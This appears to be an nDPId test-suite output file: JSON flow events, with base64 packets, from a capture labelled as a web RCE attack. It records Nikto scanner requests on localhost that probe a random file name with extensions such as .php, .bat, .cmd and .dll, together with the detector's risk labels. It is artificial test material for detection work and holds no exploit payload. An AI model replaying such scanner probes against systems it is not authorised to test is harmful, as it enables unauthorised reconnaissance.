+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276678,"flow_last_seen":1576420276678,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276678,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49570,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1576420276678,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276678,"pkt":"AAAAAAAAAAAAAAAACABFAADFtjJAAEAGhf5\/AAABfwAAAcGiH5AIK44ii9cP6IAYAED+uQAAAQEICp1m+u6dZvruR0VUIC8waFhDNlpVRS5waHAzIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276678,"flow_last_seen":1576420276678,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276678,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49570,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.php3","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276679,"flow_last_seen":1576420276679,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276679,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49572,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1576420276679,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276679,"pkt":"AAAAAAAAAAAAAAAACABFAADEHFNAAEAGH99\/AAABfwAAAcGkH5DblSRB+hg5GYAYAED+uAAAAQEICp1m+u+dZvrvR0VUIC8waFhDNlpVRS5iYXQgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276679,"flow_last_seen":1576420276679,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276679,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49572,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.bat","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276680,"flow_last_seen":1576420276680,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276680,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49574,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1576420276680,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276680,"pkt":"AAAAAAAAAAAAAAAACABFAADBM9JAAEAGCGN\/AAABfwAAAcGmH5Br4QvDZx90z4AYAED+tQAAAQEICp1m+vCdZvrwR0VUIC8waFhDNlpVRS8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276680,"flow_last_seen":1576420276680,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276680,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49574,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276681,"flow_last_seen":1576420276681,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276681,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49576,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1576420276681,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276681,"pkt":"AAAAAAAAAAAAAAAACABFAADEACBAAEAGPBJ\/AAABfwAAAcGoH5CXxDgNS2MhWYAYAED+uAAAAQEICp1m+vGdZvrxR0VUIC8waFhDNlpVRS5jZm0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276681,"flow_last_seen":1576420276681,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276681,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49576,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276683,"flow_last_seen":1576420276683,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276683,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49578,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1576420276683,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276683,"pkt":"AAAAAAAAAAAAAAAACABFAADDkEpAAEAGq+h\/AAABfwAAAcGqH5CEAqhbm4E5vYAYAED+twAAAQEICp1m+vKdZvryR0VUIC8waFhDNlpVRS5wbCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276683,"flow_last_seen":1576420276683,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276683,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49578,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276685,"flow_last_seen":1576420276685,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276685,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49580,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1576420276685,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276685,"pkt":"AAAAAAAAAAAAAAAACABFAADE6exAAEAGUkV\/AAABfwAAAcGsH5Ci99H6PnUDOIAYAED+uAAAAQEICp1m+vWdZvr1R0VUIC8waFhDNlpVRS5jbWQgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276685,"flow_last_seen":1576420276685,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276685,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49580,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.cmd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276686,"flow_last_seen":1576420276686,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276686,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49582,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1576420276686,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276686,"pkt":"AAAAAAAAAAAAAAAACABFAADEl0RAAEAGpO1\/AAABfwAAAcGuH5BUwq9SBePOj4AYAED+uAAAAQEICp1m+vadZvr2R0VUIC8waFhDNlpVRS5odG0gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276686,"flow_last_seen":1576420276686,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276686,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49582,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276687,"flow_last_seen":1576420276687,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276687,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49584,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1576420276687,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276687,"pkt":"AAAAAAAAAAAAAAAACABFAADFbA5AAEAG0CJ\/AAABfwAAAcGwH5CxUlQZUrozMIAYAED+uQAAAQEICp1m+vedZvr3R0VUIC8waFhDNlpVRS5odG1sIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276687,"flow_last_seen":1576420276687,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276687,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49584,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.html","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276689,"flow_last_seen":1576420276689,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49586,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1576420276689,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276689,"pkt":"AAAAAAAAAAAAAAAACABFAADEYhpAAEAG2hd\/AAABfwAAAcGyH5BKOloN5Bjd7oAYAED+uAAAAQEICp1m+vmdZvr5R0VUIC8waFhDNlpVRS5kbGwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276689,"flow_last_seen":1576420276689,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49586,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276690,"flow_last_seen":1576420276690,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276690,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49588,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1576420276690,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276690,"pkt":"AAAAAAAAAAAAAAAACABFAADErQxAAEAGjyV\/AAABfwAAAcG0H5DNO5UfftfaRYAYAED+uAAAAQEICp1m+vqdZvr6R0VUIC8waFhDNlpVRS5waHAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276690,"flow_last_seen":1576420276690,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276690,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49588,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276692,"flow_last_seen":1576420276692,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276692,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49590,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1576420276692,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276692,"pkt":"AAAAAAAAAAAAAAAACABFAADEWZ5AAEAG4pN\/AAABfwAAAcG2H5D\/SmGKHR\/Uy4AYAED+uAAAAQEICp1m+vydZvr7R0VUIC8waFhDNlpVRS5hc3AgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276692,"flow_last_seen":1576420276692,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276692,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49590,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 